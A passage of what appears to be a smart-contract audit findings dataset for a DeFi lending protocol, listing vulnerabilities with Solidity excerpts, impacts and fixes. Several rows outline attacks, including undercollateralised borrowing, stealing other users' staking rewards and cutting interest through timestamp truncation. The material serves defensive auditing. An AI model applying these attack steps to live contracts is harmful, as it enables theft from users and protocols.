is not applied if there are no live borads\\n }\\n\\n return (burnableLiquidity.divideDecimal(tokenPriceWithFee), tokenPriceWithFee, stale);\\n }\\n```\\n\\nFrom the code, it is clear that the withdrawal fee is subtracted only when the related option market has live boards. 
Because `Vault_Lyra.sol` applies a withdrawal fee all the time to price the collateral, it means the user's collateral is under-valued.",Make sure to apply withdrawal fee consistent to how Lyra pool does.,User's collaterals are under-valued than reasonable and might get to a liquidatable status sooner than expected. A liquidator can abuse this to get an unfair profit by liquidating the user's collateral with the under-estimated value and withdrawing it from the Lyra pool without paying a withdrawal fee.,"```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice();\\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee\\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n" +Bad debt may persist even after complete liquidation in Velo Vault due to truncation,medium,"When liquidating a user, if all their collateral is taken but it is not valuable enough to repay the entire loan they would be left with remaining debt. This is what is known as bad debt because there is no collateral left to take and the user has no obligation to pay it back. When this occurs, the vault will forgive the user's debts, clearing the bad debt. 
The problem is that the valuations are calculated in two different ways which can lead to truncation issue that completely liquidates a user but doesn't clear their bad debt.\\n```\\n uint256 totalUserCollateral = totalCollateralValue(_collateralAddress, _loanHolder);\\n uint256 proposedLiquidationAmount;\\n { //scope block for liquidationAmount due to stack too deep\\n uint256 liquidationAmount = viewLiquidatableAmount(totalUserCollateral, 1 ether, isoUSDBorrowed, liquidatableMargin);\\n require(liquidationAmount > 0 , ""Loan not liquidatable"");\\n proposedLiquidationAmount = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n require(proposedLiquidationAmount <= liquidationAmount, ""excessive liquidation suggested"");\\n }\\n uint256 isoUSDreturning = proposedLiquidationAmount*LIQUIDATION_RETURN/LOAN_SCALE;\\n if(proposedLiquidationAmount >= totalUserCollateral){\\n //@audit bad debt cleared here\\n }\\n```\\n\\nThe primary check before clearing bad debt is to check if `proposedLiquidationAmount >= totalUserCollateral`. The purpose of this check is to confirm that all of the user's collateral is being liquidated. The issue is that each value is calculated differently.\\n```\\nfunction totalCollateralValue(address _collateralAddress, address _owner) public view returns(uint256){\\n NFTids memory userNFTs = loanNFTids[_collateralAddress][_owner];\\n IDepositReceipt depositReceipt = IDepositReceipt(_collateralAddress);\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 totalPooledTokens;\\n for(uint256 i =0; i < NFT_LIMIT; i++){\\n //check if each slot contains an NFT\\n if (userNFTs.ids[i] != 0){\\n totalPooledTokens += depositReceipt.pooledTokens(userNFTs.ids[i]);\\n }\\n }\\n return(depositReceipt.priceLiquidity(totalPooledTokens));\\n}\\n```\\n\\n`totalCollateralValue` it used to calculate `totalUserCollateral`. In this method the pooled tokens are summed across all NFT's then they are priced. 
This means that the value of the liquidity is truncated exactly once.\\n```\\nfunction _calculateProposedReturnedCapital(\\n address _collateralAddress, \\n CollateralNFTs calldata _loanNFTs, \\n uint256 _partialPercentage\\n ) internal view returns(uint256){\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 proposedLiquidationAmount;\\n require(_partialPercentage <= LOAN_SCALE, ""partialPercentage greater than 100%"");\\n for(uint256 i = 0; i < NFT_LIMIT; i++){\\n if(_loanNFTs.slots[i] < NFT_LIMIT){\\n if((i == NFT_LIMIT -1) && (_partialPercentage > 0) && (_partialPercentage < LOAN_SCALE) ){\\n //final slot is NFT that will be split if necessary\\n proposedLiquidationAmount += \\n (( _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]) \\n *_partialPercentage)/ LOAN_SCALE);\\n } \\n else {\\n proposedLiquidationAmount += _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]);\\n }\\n }\\n }\\n return proposedLiquidationAmount;\\n}\\n```\\n\\n`_calculateProposedReturnedCapital` is used to calculate `proposedLiquidationAmount`. The key difference is that each NFT is priced individually. The result is that the value is truncated up to NFT_LIMIT times. This can lead to `proposedLiquidationAmount` being less than totalUserCollateral even if all user collateral is being liquidated.\\nExample: User A has 2 NFTs. They are valued as follows assuming no truncation: 10.6 and 10.7. When calculating via `totalCollateralValue` they will be summed before they are truncated while in `_calculateProposedReturnedCapital` they will be truncated before they are summed.\\ntotalCollateralValue: 10.6 + 10.7 = 21.3 => 21 (truncated)\\n_calculateProposedReturnedCapital: 10.6 => 10 (truncated) 10.7 => 10 (truncated)\\n10 + 10 = 20\\nAs shown above when using the exact same inputs into our two different functions the final answer is different. 
In a scenario like this, even though all collateral is taken from the user, their bad debt won't be cleared.","`_calculateProposedReturnedCapital` should be changed to be similar to `totalCollateralValue`, summing all pooled tokens before pricing:\\n```\\n function _calculateProposedReturnedCapital(\\n address _collateralAddress, \\n CollateralNFTs calldata _loanNFTs, \\n uint256 _partialPercentage\\n ) internal view returns(uint256) {\\n+ IDepositReceipt depositReceipt = IDepositReceipt(_collateralAddress);\\n //slither-disable-next-line uninitialized-local-variables\\n+ uint256 totalPooledTokens\\n- uint256 proposedLiquidationAmount;\\n require(_partialPercentage <= LOAN_SCALE, ""partialPercentage greater than 100%"");\\n for(uint256 i = 0; i < NFT_LIMIT; i++){\\n if(_loanNFTs.slots[i] < NFT_LIMIT){\\n if((i == NFT_LIMIT -1) && (_partialPercentage > 0) && (_partialPercentage < LOAN_SCALE) ){\\n //final slot is NFT that will be split if necessary\\n+ totalPooledTokens += ((depositReceipt.pooledTokens(userNFTs.ids[i]) * _partialPercentage) / LOAN_SCALE);\\n- proposedLiquidationAmount += \\n- (( _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]) \\n- *_partialPercentage)/ LOAN_SCALE);\\n } \\n else{\\n+ totalPooledTokens += depositReceipt.pooledTokens(userNFTs.ids[i]);\\n- proposedLiquidationAmount += _priceCollateral(IDepositReceipt(_collateralAddress), _loanNFTs.ids[i]);\\n }\\n }\\n }\\n+ return(depositReceipt.priceLiquidity(totalPooledTokens));\\n- return proposedLiquidationAmount;\\n }\\n```\\n",Bad debt will not be cleared in some liquidation scenarios,"```\\n uint256 totalUserCollateral = totalCollateralValue(_collateralAddress, _loanHolder);\\n uint256 proposedLiquidationAmount;\\n { //scope block for liquidationAmount due to stack too deep\\n uint256 liquidationAmount = viewLiquidatableAmount(totalUserCollateral, 1 ether, isoUSDBorrowed, liquidatableMargin);\\n require(liquidationAmount > 0 , ""Loan not liquidatable"");\\n 
proposedLiquidationAmount = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n require(proposedLiquidationAmount <= liquidationAmount, ""excessive liquidation suggested"");\\n }\\n uint256 isoUSDreturning = proposedLiquidationAmount*LIQUIDATION_RETURN/LOAN_SCALE;\\n if(proposedLiquidationAmount >= totalUserCollateral){\\n //@audit bad debt cleared here\\n }\\n```\\n" +priceLiquidity() may not work if PriceFeed.aggregator() is updated,medium,"priceLiquidity() may not work if PriceFeed.aggregator() is updated\\nIn the constructor of the DepositReceipt_* contract, the value of minAnswer/maxAnswer in priceFeed.aggregator() is obtained and assigned to *MinPrice/*MaxPrice as the maximum/minimum price limit when calling the getOraclePrice function in priceLiquidity, and *MinPrice/*MaxPrice can not change.\\n```\\n IAccessControlledOffchainAggregator aggregator = IAccessControlledOffchainAggregator(priceFeed.aggregator());\\n //fetch the pricefeeds hard limits so we can be aware if these have been reached.\\n tokenMinPrice = aggregator.minAnswer();\\n tokenMaxPrice = aggregator.maxAnswer();\\n// rest of code\\n uint256 oraclePrice = getOraclePrice(priceFeed, tokenMaxPrice, tokenMinPrice);\\n// rest of code\\n function getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = _priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. 
Helps prevent a LUNA like issue\\n require(signedPrice > 0, ""Negative Oracle Price"");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , ""Stale pricefeed"");\\n require(signedPrice < _maxPrice, ""Upper price bound breached"");\\n require(signedPrice > _minPrice, ""Lower price bound breached"");\\n```\\n\\nBut in the priceFeed contract, the address of the aggregator can be changed by the owner, which may cause the value of minAnswer/maxAnswer to change, and the price limit in the DepositReceipt_* contract to be invalid, and priceLiquidity() can not work.\\n```\\n function confirmAggregator(address _aggregator)\\n external\\n onlyOwner()\\n {\\n require(_aggregator == address(proposedAggregator), ""Invalid proposed aggregator"");\\n delete proposedAggregator;\\n setAggregator(_aggregator);\\n }\\n\\n\\n /*\\n * Internal\\n */\\n\\n function setAggregator(address _aggregator)\\n internal\\n {\\n uint16 id = currentPhase.id + 1;\\n currentPhase = Phase(id, AggregatorV2V3Interface(_aggregator));\\n phaseAggregators[id] = AggregatorV2V3Interface(_aggregator);\\n }\\n // rest of code\\n function aggregator()\\n external\\n view\\n returns (address)\\n {\\n return address(currentPhase.aggregator);\\n }\\n```\\n",Consider getting latest priceFeed.aggregator().minAnswer()/maxAnswer() in priceLiquidity(),,"```\\n IAccessControlledOffchainAggregator aggregator = IAccessControlledOffchainAggregator(priceFeed.aggregator());\\n //fetch the pricefeeds hard limits so we can be aware if these have been reached.\\n tokenMinPrice = aggregator.minAnswer();\\n tokenMaxPrice = aggregator.maxAnswer();\\n// rest of code\\n uint256 oraclePrice = getOraclePrice(priceFeed, tokenMaxPrice, tokenMinPrice);\\n// rest of code\\n function getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = 
_priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. Helps prevent a LUNA like issue\\n require(signedPrice > 0, ""Negative Oracle Price"");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , ""Stale pricefeed"");\\n require(signedPrice < _maxPrice, ""Upper price bound breached"");\\n require(signedPrice > _minPrice, ""Lower price bound breached"");\\n```\\n" +Vault_Synths.sol code does not consider protocol exchange fee when evaluating the Collateral worth,medium,"Vault_Synths.sol code does not consider protocol fee.\\nIf we look into the good-written documentation:\\nI want to quote:\\nBecause the withdrawalFee of a lyra LP pool can vary we must fetch it each time it is needed to ensure we use an accurate value. LP tokens are devalued by this as a safety measure as any liquidation would include selling the collateral and so should factor in that cost to ensure it is profitable.\\nIn Vault_Lyra.sol, when calculating the collateral of the LP token, the fee is taken into consideration.\\n```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice(); \\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee \\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n\\nThis is not the case for Vault_Synths.sol, the underlying token also charge exchange fee, but this fee is not reflected when 
evaluating the Collateral worth.\\nExchange fees are generated whenever a user exchanges one synthetic asset (Synth) for another through Synthetix.Exchange. Fees are typically between 10-100 bps (0.1%-1%), though usually 30 bps, and when generated are sent to the fee pool, where it is available to be claimed proportionally by SNX stakers each week.\\nwe can see that the sETH token charges 0.25%, the sBTC token charges 0.25%, the sUSD charges 0% fee, but this does not ensure this fee rate will not change in the future.","We recommend the project consider protocol exchange fee when evaluating the Collateral worth in Vault_Synths.sol\\nPrecisely when the exchange fee is updated, the fee is reflected in the collateral worth.\\n```\\n function setExchangeFeeRateForSynths(bytes32[] calldata synthKeys, uint256[] calldata exchangeFeeRates)\\n external\\n onlyOwner\\n {\\n flexibleStorage().setExchangeFeeRateForSynths(SETTING_EXCHANGE_FEE_RATE, synthKeys, exchangeFeeRates);\\n for (uint i = 0; i < synthKeys.length; i++) {\\n emit ExchangeFeeUpdated(synthKeys[i], exchangeFeeRates[i]);\\n }\\n }\\n\\n /// @notice Set exchange dynamic fee threshold constant in decimal ratio\\n /// @param threshold The exchange dynamic fee threshold\\n /// @return uint threshold constant\\n function setExchangeDynamicFeeThreshold(uint threshold) external onlyOwner {\\n require(threshold != 0, ""Threshold cannot be 0"");\\n\\n flexibleStorage().setUIntValue(SETTING_CONTRACT_NAME, SETTING_EXCHANGE_DYNAMIC_FEE_THRESHOLD, threshold);\\n\\n emit ExchangeDynamicFeeThresholdUpdated(threshold);\\n }\\n```\\n",The collateral may be overvalued because the exchange does not count when evaluating the Collateral worth and result in bad debt which makes the project insolvent.,"```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = 
ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice(); \\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee \\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n" +User is unable to partially payback loan if they aren't able to post enough isoUSD to bring them back to minOpeningMargin,high,"The only way for a user to reduce their debt is to call closeLoan. If the amount repaid does not bring the user back above minOpeningMargin then the transaction will revert. This is problematic for users that wish to repay their debt but don't have enough to get back to minOpeningMargin as it could lead to unfair liquidations.\\n```\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore leftover debts less than $0.001\\n uint256 collateralLeft = collateralPosted[_collateralAddress][msg.sender] - _collateralToUser;\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateralLeft); \\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , ""Remaining debt fails to meet minimum margin!"");\\n }\\n```\\n\\nThe checks above are done when a user calls closeLoan. This ensures that the user's margin is back above minOpeningMargin before allowing them to remove any collateral. This is done as a safeguard to block loans users from effectively opening loans at lower than desired margin. This has the unintended consequence that as user cannot pay off any of their loan if they do not increase their loan back above minOpeningMargin. 
This could prevent users from being able to save a loan that is close to liquidation causing them to get liquidated when they otherwise would have paid off their loan.","I recommend adding a separate function that allows users to pay off their loan without removing any collateral:\\n```\\nfunction paybackLoan(\\n address _collateralAddress,\\n uint256 _USDToVault\\n ) external override whenNotPaused \\n {\\n _collateralExists(_collateralAddress);\\n _closeLoanChecks(_collateralAddress, 0, _USDToVault);\\n //make sure virtual price is related to current time before fetching collateral details\\n //slither-disable-next-line reentrancy-vulnerabilities-1\\n _updateVirtualPrice(block.timestamp, _collateralAddress);\\n ( \\n bytes32 currencyKey,\\n uint256 minOpeningMargin,\\n ,\\n ,\\n ,\\n uint256 virtualPrice,\\n \\n ) = _getCollateral(_collateralAddress);\\n //check for frozen or paused collateral\\n _checkIfCollateralIsActive(currencyKey);\\n\\n uint256 isoUSDdebt = (isoUSDLoanAndInterest[_collateralAddress][msg.sender] * virtualPrice) / LOAN_SCALE;\\n require( isoUSDdebt >= _USDToVault, ""Trying to return more isoUSD than borrowed!"");\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n\\n uint256 collateral = collateralPosted[_collateralAddress][msg.sender];\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateral); \\n uint256 borrowMargin = (outstandingisoUSD * liquidatableMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , ""Liquidation margin not met!"");\\n \\n //record paying off loan principle before interest\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 interestPaid;\\n uint256 loanPrinciple = isoUSDLoaned[_collateralAddress][msg.sender];\\n if( loanPrinciple >= _USDToVault){\\n //pay off loan principle first\\n isoUSDLoaned[_collateralAddress][msg.sender] = loanPrinciple - _USDToVault;\\n }\\n else{\\n interestPaid = _USDToVault - loanPrinciple;\\n //loan principle is fully repaid so record this.\\n 
isoUSDLoaned[_collateralAddress][msg.sender] = 0;\\n }\\n //update mappings with reduced amounts\\n isoUSDLoanAndInterest[_collateralAddress][msg.sender] = isoUSDLoanAndInterest[_collateralAddress][msg.sender] - ((_USDToVault * LOAN_SCALE) / virtualPrice);\\n emit ClosedLoan(msg.sender, _USDToVault, currencyKey, 0);\\n //Now all effects are handled, transfer the assets so we follow CEI pattern\\n _decreaseLoan(_collateralAddress, 0, _USDToVault, interestPaid);\\n}\\n```\\n",User is unable to make partial repayments if their payment does not increase margin enough,"```\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore leftover debts less than $0.001\\n uint256 collateralLeft = collateralPosted[_collateralAddress][msg.sender] - _collateralToUser;\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateralLeft); \\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , ""Remaining debt fails to meet minimum margin!"");\\n }\\n```\\n" +The calculation of ````totalUSDborrowed```` in ````openLoan()```` is not correct,high,"The `openLoan()` function wrongly use `isoUSDLoaned` to calculate `totalUSDborrowed`. 
Attacker can exploit it to bypass security check and loan isoUSD with no enough collateral.\\nvulnerability point\\n```\\nfunction openLoan(\\n // // rest of code\\n ) external override whenNotPaused \\n {\\n //// rest of code\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, _colAmount\\n + collateralPosted[_collateralAddress][msg.sender]);\\n uint256 totalUSDborrowed = _USDborrowed \\n + (isoUSDLoaned[_collateralAddress][msg.sender] * virtualPrice)/LOAN_SCALE;\\n // @audit should be isoUSDLoanAndInterest[_collateralAddress][msg.sender]\\n require(totalUSDborrowed >= ONE_HUNDRED_DOLLARS, ""Loan Requested too small"");\\n uint256 borrowMargin = (totalUSDborrowed * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD >= borrowMargin, ""Minimum margin not met!"");\\n\\n // // rest of code\\n}\\n```\\n\\nAttack example: <1>Attacker normally loans and produces 10000 isoUSD interest <2>Attacker repays principle but left interest <3>Attacker open a new 10000 isoUSD loan without providing collateral",See Vulnerability Detail,Attacker can loan isoUSD with no enough collateral.,"```\\nfunction openLoan(\\n // // rest of code\\n ) external override whenNotPaused \\n {\\n //// rest of code\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, _colAmount\\n + collateralPosted[_collateralAddress][msg.sender]);\\n uint256 totalUSDborrowed = _USDborrowed \\n + (isoUSDLoaned[_collateralAddress][msg.sender] * virtualPrice)/LOAN_SCALE;\\n // @audit should be isoUSDLoanAndInterest[_collateralAddress][msg.sender]\\n require(totalUSDborrowed >= ONE_HUNDRED_DOLLARS, ""Loan Requested too small"");\\n uint256 borrowMargin = (totalUSDborrowed * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD >= borrowMargin, ""Minimum margin not met!"");\\n\\n // // rest of code\\n}\\n```\\n" +User can steal rewards from other users by withdrawing their Velo Deposit NFTs from other users' depositors,high,"Rewards from staking AMM tokens accumulate to the depositor used to deposit them. 
The rewards accumulated by a depositor are passed to the owner when they claim. A malicious user can steal the rewards from other users by manipulating other users' depositors. Since any NFT of a DepositReceipt can be withdrawn from any depositor with the same DepositReceipt, a malicious user could mint an NFT on their depositor then withdraw it from another user's depositor. The net effect is that the victim's deposits will effectively be in the attacker's depositor and the attacker will collect all the rewards.\\n```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n\\nEvery user must create a `Depositor` using `Templater` to interact with vaults and take loans. `Depositor#withdrawFromGauge` allows any user to withdraw any NFT that was minted by the same `DepositReceipt`. This is where the issue arises. Since rewards are accumulated to the `Depositor` in which the underlying is staked, a user can deposit to their `Depositor` then withdraw their NFT through the `Depositor` of another user that uses the same `DepositReceipt`. The effect is that the tokens will remain staked to the attacker's `Depositor`, allowing them to steal all of the other user's rewards.\\nExample: `User A` and `User B` both create a `Depositor` for the same `DepositReceipt`. Both users deposit 100 tokens into their respective `Depositors`. `User B` now calls `withdrawFromGauge` on `Depositor` A. `User B` gets their 100 tokens back and `Depositor B` still has 100 tokens deposited in it. 
`User B` cannot steal these tokens but they are now collecting the yield on all 100 tokens via `Depositor B` and `User A` isn't getting any rewards at all because `Depositor` A no longer has any tokens deposited into Velodrome gauge.","Depositors should only be able to burn NFTs that they minted. Change DepositReciept_Base#burn to enforce this:\\n```\\n function burn(uint256 _NFTId) external onlyMinter{\\n+ //tokens must be burned by the depositor that minted them\\n+ address depositor = relatedDepositor[_NFTId];\\n+ require(depositor == msg.sender, ""Wrong depositor"");\\n require(_isApprovedOrOwner(msg.sender, _NFTId), ""ERC721: caller is not token owner or approved"");\\n delete pooledTokens[_NFTId];\\n delete relatedDepositor[_NFTId];\\n _burn(_NFTId);\\n }\\n```\\n",Malicious user can steal other user's rewards,"```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n" +Vault_Base_ERC20#_updateVirtualPrice calculates interest incorrectly if updated frequently,medium,"Updating the virtual price of an asset happens in discrete increments of 3 minutes. This is done to reduce the chance of DOS loops. The issue is that it updates the time to an incorrect timestamp. It should update to the truncated 3 minute interval but instead updates to the current timestamp. 
The result is that the interest calculation can be abused to lower effective interest rate.\\n```\\nfunction _updateVirtualPrice(uint256 _currentBlockTime, address _collateralAddress) internal { \\n ( ,\\n ,\\n ,\\n uint256 interestPer3Min,\\n uint256 lastUpdateTime,\\n uint256 virtualPrice,\\n\\n ) = _getCollateral(_collateralAddress);\\n uint256 timeDelta = _currentBlockTime - lastUpdateTime;\\n //exit gracefully if two users call the function for the same collateral in the same 3min period\\n //@audit increments \\n uint256 threeMinuteDelta = timeDelta / 180; \\n if(threeMinuteDelta > 0) {\\n for (uint256 i = 0; i < threeMinuteDelta; i++ ){\\n virtualPrice = (virtualPrice * interestPer3Min) / LOAN_SCALE; \\n }\\n collateralBook.vaultUpdateVirtualPriceAndTime(_collateralAddress, virtualPrice, _currentBlockTime);\\n }\\n}\\n```\\n\\n_updateVirtualPrice is used to update the interest calculations for the specified collateral and is always called with block.timestamp. Due to truncation threeMinuteDelta is always rounded down, that is if there has been 1.99 3-minute intervals it will truncate to 1. The issue is that in the collateralBook#vaultUpdateVirtualPriceAndTime subcall the time is updated to block.timestamp (_currentBlockTime).\\nExample: lastUpdateTime = 1000 and block.timestamp (_currentBlockTime) = 1359.\\ntimeDelta = 1359 - 1000 = 359\\nthreeMinuteDelta = 359 / 180 = 1\\nThis updates the interest by only as single increment but pushes the new time forward 359 seconds. When called again it will use 1359 as lastUpdateTime which means that 179 seconds worth of interest have been permanently lost. Users with large loan positions could abuse this to effectively halve their interest accumulation. 
Given how cheap optimism transactions are it is highly likely this could be exploited profitably with a bot.","Before updating the interest time it should first truncate it to the closest 3-minute interval:\\n```\\n if(threeMinuteDelta > 0) {\\n for (uint256 i = 0; i < threeMinuteDelta; i++ ){\\n virtualPrice = (virtualPrice * interestPer3Min) / LOAN_SCALE; \\n }\\n+ _currentBlockTime = (_currentBlockTime / 180) * 180;\\n collateralBook.vaultUpdateVirtualPriceAndTime(_collateralAddress, virtualPrice, _currentBlockTime);\\n }\\n```\\n","Interest calculations will be incorrect if they are updated frequently, which can be abused by users with large amounts of debt to halve their accumulated interest","```\\nfunction _updateVirtualPrice(uint256 _currentBlockTime, address _collateralAddress) internal { \\n ( ,\\n ,\\n ,\\n uint256 interestPer3Min,\\n uint256 lastUpdateTime,\\n uint256 virtualPrice,\\n\\n ) = _getCollateral(_collateralAddress);\\n uint256 timeDelta = _currentBlockTime - lastUpdateTime;\\n //exit gracefully if two users call the function for the same collateral in the same 3min period\\n //@audit increments \\n uint256 threeMinuteDelta = timeDelta / 180; \\n if(threeMinuteDelta > 0) {\\n for (uint256 i = 0; i < threeMinuteDelta; i++ ){\\n virtualPrice = (virtualPrice * interestPer3Min) / LOAN_SCALE; \\n }\\n collateralBook.vaultUpdateVirtualPriceAndTime(_collateralAddress, virtualPrice, _currentBlockTime);\\n }\\n}\\n```\\n" +All collateral in Velodrome vault will be permantly locked if either asset in liquidity pair stays outside of min/max price,medium,"The oracles used have a built in safeguard to revert the transaction if the queried asset is outside of a defined price range. The issue with this is that every vault interaction requires the underlying collateral to be valued. 
If one of the assets in the pair goes outside it's immutable range then the entire vault will be frozen and all collateral will be permanently stuck.\\n```\\nfunction getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = _priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. Helps prevent a LUNA like issue\\n require(signedPrice > 0, ""Negative Oracle Price"");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , ""Stale pricefeed"");\\n\\n //@audit revert if price is outside of immutable bounds\\n require(signedPrice < _maxPrice, ""Upper price bound breached"");\\n require(signedPrice > _minPrice, ""Lower price bound breached"");\\n uint256 price = uint256(signedPrice);\\n return price;\\n}\\n```\\n\\nThe lines above are called each time and asset is priced. If the oracle returns outside of the predefined range then the transaction will revert.\\n```\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n //@audit contract prices withdraw collateral\\n uint256 colInUSD = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore debts less than $0.001\\n uint256 collateralLeft = totalCollateralValue(_collateralAddress, msg.sender) - colInUSD;\\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(collateralLeft > borrowMargin , ""Remaining debt fails to meet minimum margin!"");\\n }\\n```\\n\\nWhen closing a loan the vault attempts to price the users collateral. 
Since this is the only way for a user to remove collateral is to call closeLoan, if the price of either asset in the LP goes outside of its bounds then all user deposits will be lost.","If a user is closing their entire loan then there is no need to check the value of the withdraw collateral because there is no longer any debt to collateralize. Move the check inside the inequality to allow the closeLoan to always function:\\n```\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n- uint256 colInUSD = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n+ uint256 colInUSD;\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore debts less than $0.001\\n+ uint256 colInUSD = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n uint256 collateralLeft = totalCollateralValue(_collateralAddress, msg.sender) - colInUSD;\\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(collateralLeft > borrowMargin , ""Remaining debt fails to meet minimum margin!"");\\n }\\n```\\n",Entire vault will be frozen and all collateral will be permanently stuck,"```\\nfunction getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = _priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. 
Helps prevent a LUNA like issue\n require(signedPrice > 0, ""Negative Oracle Price"");\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , ""Stale pricefeed"");\n\n //@audit revert if price is outside of immutable bounds\n require(signedPrice < _maxPrice, ""Upper price bound breached"");\n require(signedPrice > _minPrice, ""Lower price bound breached"");\n uint256 price = uint256(signedPrice);\n return price;\n}\n```\n" +Outstanding loans cannot be closed or liquidated if collateral is paused,high,"When a collateral is paused by governance, `collateralValid` is set to false. This causes closing and liquidating of loans to be impossible, leading to two issues. The first is that users with existing loans are unable to close their loans to recover their collateral. The second is that since debt is impossible to liquidate the protocol could end up being stuck with a lot of bad debt.\n```\nfunction pauseCollateralType(\n address _collateralAddress,\n bytes32 _currencyKey\n ) external collateralExists(_collateralAddress) onlyAdmin {\n require(_collateralAddress != 